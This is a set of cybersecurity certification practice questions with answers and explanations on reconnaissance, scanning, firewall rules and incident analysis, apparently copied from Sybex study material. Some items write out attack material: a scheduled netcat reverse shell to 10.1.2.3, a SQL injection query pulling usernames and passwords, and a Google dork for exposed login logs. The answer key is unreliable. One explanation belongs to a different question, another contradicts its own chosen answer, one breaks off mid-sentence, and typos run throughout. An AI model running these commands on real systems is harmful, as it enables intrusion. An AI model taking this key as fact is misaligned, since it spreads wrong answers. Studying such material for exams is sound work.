Sybex Questions Section 1
Rhonda has identified a privilege's escalation flaw on the system she target in the first phase of her penetration test and is now ready to take the next step. According to the NIST 800-115 standard, what is step C that Rhonda needs to take, as shown in this diagram? A.System browsing B.Scanning C.Rooting D.COnsolidation
A.System browsing Explanation: Rhonda's next step is to prepare to pivot. To do so, she needs to browse for additional systems and to identify the methods she will use to access them. At times, this will move her back into discovery phase
Alex has been asked to implement network controls to ensure that users who authenticate to the network are physically in the building that the network they are authenticating to servers. What technology and tool should he use to do this? A.Geo-IP and port security B.GPS location and NAC C.GPS location and port security D.Geo-IP and NAC
B.GPS location and NAC Explanation: DNS poisoning uses modified DNS cache entries to redirect unsuspecting users to alternate IP addresses. This may be intentional if the DNS server owner wants to ensure that specific sites are blocked, but it can also be leveraged by attackers who manage to either take control of the DNS server or who manage to spoof or modify DNS updates
Lauren has local access to a Wndows workstation and wants to gather infomration about the organization that it belongs to. What type of information can she gain if she executes the command: 'nbstat -c' A.MAC address and IP addresses of local systems B.NetBIOS name-to-IP address mappings C.A list of all NetBIOS systems that the host is connected to D.NetBIOS MAC-to-IP address mappings
B.NetBIOS name-to-IP address mappings Explanation: The command nbstat -c shows the contents of the NetBios name cache and shows a list of name-to-IP address mappings
What two pieces of information does nmap need to estimate network patch distance? A.IP address and TTL B.TTL and operating system C.Operating system and BGP flags D.TCP flags and IP address
B.TTL and operating system Explanation: nmap can combine operating system identification and time to live to take a reasonable guess at the number of hops in the network path between the scanner and a remote system. The operating system guess will provide the base time to live, and the TTL counter will decrement at each hop. Given these two pieces of information, nmap takes an educated but often very accurate guess
What is the default nmap scan type when nmap is not provided with a scan type flag? A.A TCP FINscan B.A TCP connect scan C.A TCP SYN scan D.A UDP scan
C.A TCP SYN scan Explanation: By Default, nmap uses a TCP SYN scan. If the user does not have proper socket privileges (such as root on a Linux system), it will use a TCP connect scan
Geoff wants to perform passive reconnaissance as part of an evaluation of his organizations security controls. Which of the following techniques is a valid technique to perform as part of a passive DNS assessment? A.A DNS forward or reverse lookup B. A zone transfer C.A WHOIS query D.Using maltego
C.A WHOIS query Explanation: Performinng a WHOIS query is the only passive reconnaissance technique listed. Each of the other techniques performs an active reconnaissance task
Lauren submits a suspected malware file to malwr.com and receives the following information about its behavior. What type of tool is malwe.com? A.A reverse-engineering tool B.A static analysis sandbox C.A dynamic analysis sandbox D.A decompiler sandbox
C.A dynamic analysis sandbox Explanation: Laurens screenshot shows behavioral analysis of the executed code. From this, you can determine that malwr is a dynamic analysis sandbox that runs the malware sample to determine what it does while also analyzing the file
While conducting a topology scan of a remote web server, Susan notes that the IP address returned for the same DNS entry change over time. What has she likely encountered? A.A route change B.Fast flux DNS C.A load balancer D.An IP mismatch
C.A load balancer Explanation: Load Balancers can alias multiple servers to the same hostnme. This can be confusing when conducting scans, as it may appear that mutiple IP addresses or host are responding for the same system
Charles is investigating a process that he believes may be malicious. What Linux command can he use to determine what files that process has open? A.ps B.procmap C.lsof D.filemap
C.lsof Explanation: The lsof command, or "list open files", can report on open files and which process opened them Charles can use lsof to find his answers:quickly!
Chris wants to prevent remote login attacks against the root account on a Linux system. What method will stop attacks like this while allowing normal users to use ssh? A.Add an iptables rule blocking root logins B.Add root to the sudoers group C.Change sshd_config to deny root login D.Add a network IPS rule to block root logins
Change sshd_config to deny root login Explanation: Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Chris's goal
Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on? A.508 B.617 C.846 D.714
D.714 Explanation: The service running from the www directory as the user apache should be an immediate indication of something strange and the use of webmin from that directory should also be strong indicator of something wrong. Lucas should focus on the web server for the point of entry to the system and should review any files that the Apcache user has created or modified. If local vulnerabilities existed when this compromise occured, the attacker may have already escalated to another account
Use the following scenario and image to answer the following three questions: While reviewing a system she is responsible for, Amanda notices that the system is performing poorly and runs htop to see a graphical representation of system resource usage. She sees the following information: What issue should Amanda report to the system administrator? A.High network utilization B.High memory utilization C.Insufficient swap space D.High CPU utilization
D.High CPU utilization Explanation: This view of htop shows both CPU1 and CPU2 are maxed out at 100 percent. Memory is just over 60 percent used. Almost all swap space is available.
As part of her system hardening process for a Windows 10 Workstation, Lauren runs the Microsoft Baseline System Analyzer. She sees the following result after MBSA runs. What can she determine from this scan? A.The system has been compromised, and shared allows all user to read and execute administrative files B.THe system has default administrative shares enabled C.The system is part of a domain that uses administrative shares to manage systems D.The shares a properly secure and pose no threat to the system D.
.B.THe system has default administrative shares enabled. While administrative shares are useful for remote administration, they can pose a threat for systems that do not require them, and some security baselines suggest disabling them in the registry if they are not used
While performing reconnaissance of an organizations network, Angela discovers that web.organization.com, www.organization.com, and documents,organization.com all point to the same host. A. A CNAME B.An MX record C.An SPF record D.An SOA record
A. A CNAME Explanation: A canonical name (CNAME) is used to alias one name to another. Incorrect answers: MX records are used for mail servers. SPF records indicate the mail exchanges (MXes) that are authorized to send mail for a domain, SPA records is the Start of Authority record that notes where the domain is delegated from its parent domain
Which of the following tools is not typically associated with the reconnaissance phase of a penetration test? A.Metasplot B.nmap C.Nessus D.Maltegoon
A.Metasplot Explanation: Metasploit is primarily an exploitation tool. While it has modules that can be used for reconnaissance, it is primarily used to target discovered vulnerabilities nmap,Nessus, and Maltego are all commonly used to discover information
Selah has been tasked with gathering information increase her penetration testing teams understanding of their customers Internet footprint. She wants to gather details of emails, subdomains, employee names, and other information in an automated way. Which of the following tools is best suited to her needs? A.nmap B.theHarvester C.Shodan D.osint-ng
B.theHarvester Explanation: The best option in this list for Selah's purposes is theHarvester. It combines search engine-based searches with Shodan and other data sources to gather email addresses,subdoamin information, employee names and a variety of other types of useful footrprinting data. Incorrect answers: Nmap is useful for port scanning but typically wont find email addresses and employee names SHodan is a vulnerability search engine osint-ng is a made up tool name
CHarles wants to provide additional security for his web application that currently stores passwords in plain text in a database. Which of the following options is his best option to prevent theft of the database from resulting in exposed passwords? A.Encrypt the database of plain-text passwords B.Use MD5 and a salt C.Use SHA-1 and a salt D.Use bcrypt
D.Use bcrypt Explanation: bcrypt is a strong password hashing algorithm that includes salts for the stored values. If Charles uses bcrypt, he will have made the best choice from the list, as both MD5 and SHA1 are not as strong, even with a salt. Encrypting the database may seem like a good idea, but storing plain-text passwords mean that an explit that can read the database while it is decrypted will get plain-text passwords
While reviewing his Apache logs, Charles discovers the following entry. What occurred? 10.1.1.1 -- [27/Hun/2017:11:42:22 -0500\ "Get \query.php? searchterm=stuff&%20lid=1%20UNION%20SELECT%200,username,user_id,password,name,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322 A.A successful database query B.A PHP Overflow attack C. A SQL injection attack D.An unsuccessful database query
C.A SQL injection attack Explanation: This shows an attemped SQL inection attack. The query reads 1 'UNION SELECT o and them looks for the username, user ID, password and email from the users table
Rick's security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits attack tools. What type of environment has Rick set up? A.A tarpit B.A honeypot C.A honeynet D.A blackhole
C.A honeynet Explanation: Ricks team has set up a honeynet, which is a group of systems set up to attract attackers while capturing the traffic they send and the tools and techniques they use. AS honeypot is a single system set up in a similar way, A tarpit is a system set up to slow down attackers. A blackhole is often used on a network as a destination for traffic that will be silently discarded
As part of his reconnaissance effort, Charles uses the following Google search string: "authentication failure; logname=" ext:log;site:example.com What will he find if he receives results from his targets domain? A.A list of successful logins B.A list of log names C.A list of failed logins D.A list of log files
C.A list of failed logins Explanation: This Google dort relies on log files being inadvertently exposed for a site. If the authentication logs are exposed, this will show list of failed logins, along with login paths, possibly providing Charles with a useful list of unsers. He can then leverage that list by attempting logins, by gathering further information on the users, or by using social engineering
Rick is reviewing flows of a system on his network and discovers the following flow logs. What is the system doing? A.A port scan B.A failed three-way handshake C.A ping sweep D.A traceroute
C.A ping sweep Explanation: The increasing digit of the IP address of the target system (.6,.7,.8) and the ICMP protocl echo request indicate that is a ping sweep. This could be part of a port scan, but the only behavior that is shown here is the ping sweep. This is ICMP and cannot be a three-way handshake, traceroute would follow a path, rather than a series of IP addresses
What occurs when Alex uses the follwing command to perform an nmap scan of a network? 'nmap -sP 192.168.2.0/24' A.A secure port scan of all hosts in the 192.168.0.0 to 192.168.2.255 network range B.A scan of all hosts that respond to ping in 192.168.0.0 to 192.168.255.255 network range C.A scan of all hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 network range D.A SYN-based portscan of all hosts in the 192.168.2.0 to 192.168.2.255 network range
C.A scan of all hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 network range Exlpanation: The -sP for nmap indicates a ping scan, and /24 indicates a range of 255 addresses In this case, that means that nmap will scan for hosts that respond to ping in the 192.168.2.0 to 192.168.2.255 IP address range
After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows: Send a SMS alert every 30 seconds when systems do not send logs for more than 1 minute The average administrator at Lucy's organization is responsible for 140 to 300 machines. What danger does Lucy's alert create? A.A DDoS that causes administrators to not be able to access systems B.A network outage C. Administrators may ignore or filter the alerts D.A memory spike
C.Administrators may ignore or filter the alerts Explanation: When faced with massive numbers of notification messages that are sent too aggresively, administrators are likely to ignore the alerts. Once they do, they are unlikely to respond to actual issues, causing all of the advantages of monitoring to be lost If she doesnt spend some time identifying reasonable notifications thresholds and frequencies, Lucy's next conversation is likely to be with an angry system administrator or manager
Susan wants to prevent attackers from running specific files and also wants to lock down other parts of the Windows operating system to limit the impact of attackers who have access to workstation she is responsible for. If she wants to do this on Windows 10 workstation, what tool should she use? A.Secpol.msc B.FileVault C.AppLocker
C.AppLocker Explanation: AppLocker is a tool available for Windows 10 systems that allows rules based on file attributes to limit what applications and files users can run, including executable files, scripts, Windows Installer files, DLLs, packaged applications, and packaged application installers Secpol.msc is the security policy snap-in and controls other parts of the Windows security configuration FileVault is the MaxOS file encryption system GPed is made-up program
Lauren's honeynet, shown here, is configured to use a segment of unused network space that has no legitimate servers in it. What type of threats is this design particularly useful for detecting? A.Zero-day attacks B.SQL Injection C.Network scans D.DDoS attacks
Network scans Explanation: Detection systems placed in otherwise unused network space will detect scans that blindly traverse IP ranges. Since no public services are listed, attackers who scan this range can be presumed to be hostile and are often immediately blocked by security devices that protect production systems
Ricks manager wants to present the most trustworthy certificate possible for a website. What type of certificate should Rick get? A.EV B.DV C.OV D.IV
A. EV Explanation: Extended Validation (EV) certificates require additional action to validate that the requesters legal identity is known,as well as the operational and physical presence of the website owner. In addition, requestion organization has to prove that the domain owner has controler over the domain name and that the person requesting the certificate has the authority to do so. Finally, they require a signature requirement for an authorized officer of the company. Incorrect answers: DV certificates require domain ownership validation OV certificates require proof of the right to manage the domain name IV certificates are made up for this question
Andrea needs to add a firewall rule that will prevent external attackers from conducting topology gathering reconnaissance on her network. Where should she add a rule intended to block this type of traffic? A.The firewall B.The router C.The distribution switch D.The Windows 2012 Server
A. The firewall Explanation: Since Andrea is attempting to stop external scans from gathering information about her network topology, the firewall is the best place to stop them.. A well-designed ruleset can stop, or at least limit, the amount of network topology information that attackers can collect
Fred's reconnaissance of an organization includes a search of the Censys network search engine. There, he disocvers multiple certificates with validity dates as shown here: Validity: What should Fred record in his reconnaissance notes? A. The certificates expired as expect, showing proper business practice B.The certificates were expired by the CA, possibly due to nonpayment C.The system that hosts the certificates may have been compromised D.The CA may have been compromised, leading to certificate expiration
A. The certificates expired as expect, showing proper business practice Explanation: When an organization expires multiple certificattes, it often indicates a security problem that resulted in a need to invalidate the certificates. Fred should check for other information about a possible compromise near the dates of expiration
Isaac has access to a Windows system that is a member of the local Active Directory domain as part of his white-box penetration test. Which of the following commands might provide information about other systems on the network? A.net use B. net user C. net group D.net config
A. net use Explanation: The net use command will list any network shares that the workstation is using, allowing Isaac to identify file servers or others with file sharing that the workstation is configured to use. INcorrect answers: net user will show user accounts for the local PC, net group is only usable on domain controllers, net config allows the server and workstation services to be controller
While conducting a penetration test, Ben excecutes the following command 'ifconfig eth0 hw ether 08:00:27:06:d4' What network protection is Ben most likely attempting to avoid? A. port security B.NAC C. A firewall D.An IPS
A. port security Explanation: Port security filters on MAC address and the command Ben executed changed the MAC address of his PC. In most cases, simply changing a MAC address will not help him bypass NAC, and both firewalls and IPS wont care about MAC address
Charleen works for a US government contractor that uses NIST;s definition to describe threat categories. How should she categorize the threat posed by competitors that might seek to compromise her organizations website? A.Adversarial B.Accidental C.Structural D.Environmental
A.Adversarial Explanation: Adversarial threats are individuals, groups and organizations that are attempting to deliberately undermine the security of an organizatin. Adversaries may include trusted insiders, competitors, suppliers, customers,business partners or even nation states
The national insurance company that Luke works for has experienced a breach, and Luke is attempting to categorize the impact. As he reviews the incident report, he notes that the customer data that include Social Security numbers was exfiltrated from the organization. How should he categorize the impact? A.As a regulated information breach B.As an intellectual property breach C.As a confidential information breach D.As an integrity loss
A.As a regulated information breach Explanation: Luke knows that Social Security number breaches are regulated in most states in the United States and that this means his organization has experienced a regulated information breach. He will now most likely have to take actions as required by law in the states in which they have Nexus
During a white-box penetration test, Luke finds that he is suddenly unable to connect to the target network. What has likely happened? A.Automated shunning B.network link failure C.Back-off algorithms D.A BGP route change
A.Automated shunning Explanation: Automated shunning, whethervia IPS or other technology, can block attackers but can also prevent penetration testers from being able to conduct scans or attacks When planning a white-box penetration test, it is typical to discuss the presence of technologies that may block or limit the test and to either work around them or to disable them for the tester's IP addresses if they are not directly in scope
Lucca wants to validate DNS responses to ensure that they are from authoritative DNS servers. What technology can he use to do this? A.DNNSEC B.DNSCrypt C.DNShielf D.DNS is an open protocol and does not support secure validation
A.DNSSEC Explanation: DNSSEC allows authorative DNS servers to use digital signatures to validate its reponses
As part of her malware analysis process, Kara builds a diagram of the components of the suspected malware package. At each stage, she unpacks de-obfuscates and identifies each subcomponent, adding to her diagram. What is the process known as? A.Decomposition B.Disassembly C.Reverse archiving D.Fingerprinting
A.Decomposition Explanation: Kara is performing a decomposition process on the malware she is investigating. Decomposition helps to understand a software package or program and can sometimes provide information more quickly than a static or dynamic analysis, because it does not have to run a program to analyze how it behaves and does not require intensive manual review of the underlying code or disassembly of compiled code
During a port scan of her network, Cynthia discovers a workstation that shows the following ports open. What should her next action be? 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 7680/tcp open unkwown 49677/tcp open unknown A.Determine the reason for the ports being open B.Investigate the potentially compromised workstation C.Run a vulnerability scan to identify vulnerable services D.Reenable the workstations local host firewall
A.Determine the reason for the ports being opened Explanation: Cynthias first action should be to determine whether there is a legitimate reason for the workstation to have the listed ports open
WPA2 Enterprise protexted wireless networks of her target organization. What major differences exist between reconnaissance of a wired network versus a wireless network? A.Encryption and physical accessibility B.Network access control and encryption C.Port security and physical accessibility D.Authentication and encryption
A.Encryption and physical accessibility Explanation: Tracy knows that most wired networks do not use end-to-end encryption by default and that wireless networks are typically more easily accessible than a wired network that requires physicall access to a network jack or a VPN connection from an authorized account Without more detail, she cannot determine whether authentication is required for both networks, but NAC is a common security feature feature of wired networks, and WPA2 Enterprise requires authentication as well. Port security is used only for wired network connections
When Scott performs an nmap scan with the -T flag set to 5, what variable is he changing? A.How fast the scan runs B.THe TCP timeout flag it will set C.How many retries it will perform D.How long the scan will take to start up
A.How fast the scan run Explanation: The nmap -T flag accepts a setting between o (or "paranoid") and 5 or ("insane"). When Scott sets his scan to use the insane setting, it will perform the fastest scanning it can, which will likely set off any IDS or IPS that is watching for scans
Lauren's network firewall denies all inbound traffic but allows all outbound traffic. While investigating a Windows workstation, she encounters a script that runs the following command: 'at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe A.It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 B.It uses the AT command to dial a remote host via NetBIOS C.It creates an HTTPS session to 10.1.2.3 every Friday at 8:30 D.It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST
A.It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30 Explanation: The at command can be used to schedule Windows taks. This task starts netcat as a reverse shell using cmd.exe via port 443 every Friday at 8:30PM local time. Lauren should be concerned, as this allows traffic in that otherwise might be blocked
Jennifer analyzes a Wireshark packet cpature from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running on TCP ports 636 and 443. What services is that system most likely running? A.LDAPS and HTTPS B.FTPS and HTTPS C.RDP and HTTPS 4.HTTP and Seucre DNS
A.LDAPS and HTTPS Explanation: A TCP port 636 is often used for secure LDAP, and secure HTTP typically uses TCP 443. While other services could use these ports, Jennifer's best bet is to presume that they will be providing the services they are typically associated with
Charles want to limit what potential attackers can gather during passive or semipassive reconnaissance activities. Which of the following actions will typically reduce his organizations footprint the most? A.Limit information available via the organizational website without authentication B.Use a secure domain registration C.Limit the technology references in job postings D.Purge all document metadata before posting
A.Limit information available via the organizational website without authentication Explanation: Limiting the information available about an organization by requiring authentication will strongly limit the ability of potential attackers to gather information. Secure domain registration may conceal the registration contacts information but does not provide any real additional protection Limiting technologies listed in a job posting can help limit what attackers may find out, but most organizations would prefer to better match candidates. Finally, purging all metadata can help protect information about internal systems and devices but it is difficult to enforce, and document metadata is not a primary source of information about most organizations
Which sources are most commonly used to gather information about technologies a target organization uses during intelligence gathering? A.OSINT searches of support forums and social engineering B.Port scanning and social engineering C.Social media review and document metadata D.Social engineering and document metadata
A.OSINT searches of support forums and social engineering Explanation:L Since organization often protect information about the technologies they use, searches of support forums and social engineering are often combined to gather information about technologies they have in place. Port scanning will typically not provide detailed information about services and technologies. Social media review may provide some hints, but document metadat does not provide much information about specific technologies relevant to a penetration test or attack
What type of control review will focus on change management as a major element in its assessment scope? A.Operation control review B.Technical control review C.Detective control review D.Responsive control review
A.Operation control review Explanation: A review of operational controls will often look at change management, seperation of duties and other personnel controls, and process-based control. Many administrative controls are part of an operational control review. These are sometimes conducted as Service Organizational Control (SOC) audits with SOX 1, 2, and 3 reports generayed depending on the level and depth of the assessment
During the reconnaissance stage of a penetration test, Cynthia needs to gather information about the target organizations network infrastructure without causing an IPS to alert the target to her information gathering. Which of the following is her best option? A.Perform a DNS brute-force attack B.Use a nmap ping sweep C.Perform a DNS zone transfer D.Use an nmap stealth scan
A.Perform a DNS brute-force attack Explanation: While it may seem strange, a DNS brute-force attack that queries a list of IPs, common subdomains, or other lists of targets will often bypass intrusion detection and prevention systems that do not pay particular attention to DNS queries. Cynthia may not even be able to find a DNS server that is not protected by the organizations IPS
During the reconnaissance stage of penetration test, Fred calls a number of staff at the target organization. Using a script he prepared, Fred introduces himself as part of the support team for their recently installed software and ask for information about the software and its configuration. What is this technique called? A.Pretexting B.OSINT C.A tag out D.Profoling
A.Pretexting Explanation: Pretexting is a form of social engineers motives. In this case, Fred is giving his targets reason to believe he is legitatemly a member of the organizations support team. Incorrect answers: OSINT refers to open source intelligence, which is data gathered from public sources. A tag-out sometimes refers to handling off to another memeber of a penetration test team Profiling is conducted while gathering information about an individual team, or organization before conducting a social engineering attack
While scanning a network, Frank discovers a host running a service on TCP ports 1812 and 1813. What type of server has Frank most likely discovered? A.RADIUS B.VNC C.Kerberos D.Postgres
A.RADIUS Explanation: RADIUS typically uses TCP ports 1812 and 1812. Incorrect answers: Kerberos is primary a RDP service although it also uses TCP 544 and 2105 Postgres uses 5432 VNC uses 5500
Michelle has been experiencing SYN floods and deploys a mitigation technique that allows the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and continues the connection. What technique is Michelle using? A.SYN cookies B.ACK-ACK C.TCP Frogging D.SYN replay
A.SYN cookies Explanation: Using SYN cookies allows a server to act a though its SYN queue is larger than it is, reducing or completely preventing the issues encountered during a SYN flood. Discarding SYNs from the queue and waiting for a SYN-ACK allows the server to prevent resource exhaustion while still responding to legitimate coonnection requests. Of course, SYN cookies do nothing against DOS attacks that go further than a SYN flood!
Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best weay to validate her theory? A.Submit cmd.exe to VirusTotal B.Compare the hash of cmd.exe to a know good version C.Check the file using the National Software Reference Library D.Run cmd.exe to make sure its behavior is normal
A.Submit cmd.exe to VirusTotal Explanation: Susan's best option is to submit the file to a tool like VirusTotal, which will scan it for virus-like behaviors and known malware tools. Checking the hash by using either a manual check or by using the National Software Reference Library can tell her if the file matches a known good version but wont tell her if it includes malware. Running a suspect file is the worst option on the list
Charles uses Network Miner to review packet captures from his reconnaissance of a target organization. One system displayed the information shown here. What information has Network Miner used to determine that the PC is a Hewlett-Packard device? A.The MAC Address B.The OS Flags C.The systems banner D.The IP Adrdress
A.The MAC Address Explanation: A Device Manufactuer identification relies on the MAC address that includes a vendor prefix. Since MAC addresses can be changed in software, this is not guarunteed to be accurate, but in most cases, you can reasonably expect it to match the manufactuer of the NIC. THis list of prefixes can be found at http://standard.oui.ieee.org/oui/oui.txt.
Charles uses the following command while investigating a Windows workstation used by his organization vice president of finance who only works during normal business hours. Charles believes that the workstation has been used without permission by members of his organizations cleaning staff after hours. What does he know if the user ID shown is the only user ID able to log into the system and he is investigating on August 12, 2017? C;\Users\bigfish>wmic netlogin get name, lastlogon,badpasswordcount BadPassword Count LastLogon Name NT AUTHORITY\SYSTEM 0 20170811203748.00000-240 Finance\bigfish A.The account has been compromised. B.No logins have occurred C.The last login was during business hours D.Charles cannot make any determinations from this information
A.The account has been compromised Explanation: Charles can see that no invalid logins occurred and that someone logged in as the user after business hours. This means that the account has likely been compromised and that he should investigate how the password was lost. (In many cases, Charles needs to ask the VP or finance about bad passwords habits like writing it down or using a simple password)
What US government program seeks to provide trusted sources that meet the following requirements? -Provide a chain of custody for classified and unclassified integrated circuits -Ensure that there will not be any reasonable threats related to supply disruption threats related to supply distribution -Prevent intentional or unintentional modification or tampering of integrated circuits -Protect integrated circuits from reverse engineering and vulnerability testing A.Trusted Foundry B.CHain of Custody C.Trusted Suppliers D.Trusted Access Program
A.Trusted Foundry Explanation: The US Department of Defenses Trusted Foundry program is intended to ensure the integrity and confidentiality of intergrated circuits throughout the design and manufacturing life cycle while retaining access to leading-edge technology for trused and untrused uses
Chris wants to prevent users from running a popular game on Windows workstation he is responsible for. How can Chris accomplish this for Windows 10 Pro workstations? A.Using application whitelisting to prevent all unallowed programs from running B.Using Windows Defender and adding the game to the blacklist file C.By listing it in the Blocked Programs list via secpol.msc D.You cannot blacklist applications in Windows 10 without a third-party application
A.Using application whitelisting to prevent all unallowed programs from running Explanation: Windows 10 Pro and Enterprise support application whitelisting. Chris can whitelist his allowed programs and then set the default mode to "disallowed", preventing all other applications from running and thus blacklisting the application. This can be a bit of a maintenance hassle but can be useful for high-security environments or those in which limiting what programs can run is critical
Mike's penetration test requires him to use passive mapping techniques to discover network topology. Which of the following tools is best suited to that task? A.Wireshark B.nmap C.netcat D.Angry IP Scanner
A.Wireshark Explanation: A passive network mapping can be done by capturing network traffic using a sniffing tool like Wireshark, Active scanners including nmap, the Angry IP Scanner, and netcat (with the -z flag for port scanning) could all set off alarms as they scan systems on the network
Which of the following tools can be used to passively gather the information required to generate a network topology map? A.Wireshark B.nmap C.SolarWinds Network Mapper D.Nessus
A.Wireshark Explanation: Wireshark can be used to capture network traffic, allowing you to review traffic infomration to build a network topology based on time to live, IP Addresses and other information. Incorrect answers: nmap and SolarWinds Network Mapper both rely on active scans to generate topologies and Nessus does not provide a network topology generation capability
Which of the gollowing commands will provide Ben with the most information about a host? A.dig -x [ip address] B.host [ip address] C.nslookup [ipaddress[ D.zonet [ip address]
A.dig -x [ip address] Explanation: The dig command provides information including the time the query was done, details of the query that was sent, and the flags sent. In most cases, however, host, dig -x, and nslookup will provide roughly the same information. Zonet is not an actual Linux command
Angela wants to block traffic sent to a suspected malicious host. What iptables rule entry can she use to block traffic to a host with IP address 10.24.31.11? A.iptables -A OUTPUT -d 10.24.31.11 -j DROp B.iptables -A INPUT -d 10.24.31.11 -j ADD C.iptables -block -host 10.24.31.11 -j DROP D.iptables -block -ip 10.24.31.11 -j ADD
A.iptables -A OUTPUT -d 10.24.31.11 -j DROp Explanation: Adding an iptables entry uses the -A flag to add to a list. Here, you can safely assume that OUTPUT is the outbound ruleset/ The -d flag is used to designate the IP address or subnet range, and -j specifies the action , DROP
Cameron needs to set up a Linux iptables-based firewall ruleset to prevent access from hosts A and B, while allowing SMTP traffic from host C. Which set of the following commands will accomplish this? Destination host IP Address: 192.168.2.11 Host A IP Address: 10.1.1.170 Host B: 10.2.0.132 Host C: 10.2.0.130 A. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP #iptables -I INPUT 2 -s 10.2.0.0/24 --dport 25 -j DROP #iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW B. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP #iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP #iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW C. # iptables -I INPUT 2 -s 10.1.1.170 -j ALLOW #iptables -I INPUT 2 -s 10.2.0.0.134 -j ALLOW #iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j DROP D.#iptables -I INPUT 2 -s 10.1.1.170 -j DROP #iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP #iptables -I INPUT 2 -s 10.2.0.130 -j ALLOW
B. # iptables -I INPUT 2 -s 10.1.1.170 -j DROP #iptables -I INPUT 2 -s 10.2.0.0.134 -j DROP #iptables -I INPUT 2 -s 10.2.0.130 --dport 25 -j ALLOW Explanation: These commands will add filters to the INPUT ruleset that block traffic specifically from hosts A and B,, while allowing only port 25 from host C. Option D might appear attractive, but it sllows all traffic instead of only SMTP. Option A onnly drops SMTP traffic from host B ( and all of the other hosts in its /24 segment), while Option C allows traffic in from the hosts you want to block
Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables firewall. Which of the following commands is not one of the three iptables commands needed to perform this action? A. #iptables-policy INPUT DROP B. #iptables-policy SERVICE DROP C. #iptables-policy OUTPUT DROP D. #iptables-policy FORWARD DROP
B. #iptables-policy SERVICE DROP Explanation: By default, an iptables firewall will have INPUT,OUTPUT
While reviewing the Wireshark packet capture shown here, Ryan notes an extended session suing the ESP protocol. When he clicks the packets, he is unable to make sense of the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he investigates it in person? A. An encrypted RAT B.A VPN Application C.A secure web browser D.A base64-encoded packet transfer utility
B. A VPN application Explanation: ESP packets are part of the IPSEC protocol suite and are typically associated with a tunnel or VPN. Ryan should check for a VPN application and determine what service or system that user may have connected to
Andrea wants to conduct a passive footprinting exercise against a target company. Which of the following techniques is not suited to a passive footprinting process? A.WHOIS lookups B.Banner grabbing C.BGP looking glass usage D.Registrar checks
B. Banner grabbing Explanation: Banner grabbing is an active process and requires a connection to a remote host to grab the banner. THe other methods are all passive and use third-party information that does not require a direct lookup against a remote host
While reviewing output from netstat, John sees the following output. What should his next action be? [minesweeper.exe] TCP 127.0.0.1:62522 dynamo:0 LISTENING [minesweeper.exe] TCP 192.168.1.100 151.101.2.69:https ESTABLISHED A.Capture traffic to 151.101.2.69:https using Wireshark B. Initiate the organizations incident response plan C.Check to see whether 151.101.2.69 is a valid Microsoft address D.Ignore it, because this is a false positive
B. Initiate the organizations incident response plan Explanation: John has discovered a program that is accepting connections and has an open connection, neither of which is typical for the Minesweeper game. Attackers often disguise Trojans as innocent applications, so John should follow his organiziations incident response plan
Lauren wants to perform regular scans of the entire organizational network but only has a budget that supports buying hardware for a single scanner. Where should she place her scanner to have the most visibility and impact? A.Location A B.Location B C.Location C D.Location D
B. location B Explanation: Lauren will see the most important information about her organization at location B, which provides a view of data center servers behind the data center firewall. To get more information, she should request that the client network firewall ruleset include a rule allowing her scanner to scan through the firewall to all ports for all systems on all protocols
As part of an externally accessible information revieww by their security team, Bob and Lisa receive information that the security team gathered including the following entry: What type of tool could they use to gather this publicly available information about their systems in the future? A.nmap B.A BGP looking glass C.A BGP reflector D.A route/path assimilator
B.A BGP looking glass Explanation: BGP looking glasses provide a public view of route information to hosts and networks. This can provide information to penetration testers about network connectivity. While nmap has many capabilities, it doesnt provide route lookups. BGP route reflectors (also known as BGP speakers, advertise routes to peers) and rouote/path assimilators were made up for this question
Chirs knows that systems have connected to a remote host on TCP ports 1433 and 1434. If he has no other data, what should his guess be about what the host is? A.A printer server B.A Microsoft SQL server C.A MySQL server D.A secure web server running on an alternate port
B.A Microsoft SQL server Explanation: TCP ports 1433 and 1434 are commonly associated with Microsoft SQL servers. A print server will likely use ports 515,631, and 9100 A MySQL server will typically use 3306; and alternate ports for webservers vary, but 8443 is a common alternative port
Aubrey is reviewing her firewall logs for signs of attacks in her role as a blue team memeber during a penetration test. Which of the following types of attack is she least likel;y to be able to identify using a stateful packet inspection firewall? A SYN flood B.A SQL injection attack C.A port scan D.A DDoS attack
B.A SQL injection attack Explanation: Identifying a SQL injection attack requires the ability to see the content of the query. Most stateful packet inspection firewalls do not show full packet content and instead log a success or fail based on a port, IP address, and protocol based on a rule A DDoS attack may also be difficult to identify, but the massive amount of traffic from multiple sources to a single service can help point out the issue
Rick is auditing a Cisco router configuration and notes the following line: 'login block-for 120 attempt 5 with 60' What type of setting has been enabled? A. A DDoS prevention setting B.A back-off setting C.A telnet security setting D. An auto login prevention setting
B.A back-off setting Explanation: This setting blocks all logins for 120 seconds when give failed attempts occur within 60 seconds. This can slow down brute force hacking attempts, but Rick should recommend that the organization he is working with may want to consider properly isolating the administrative interfaces via a protected network segment instead of just using a back-off algorithm if they have not already
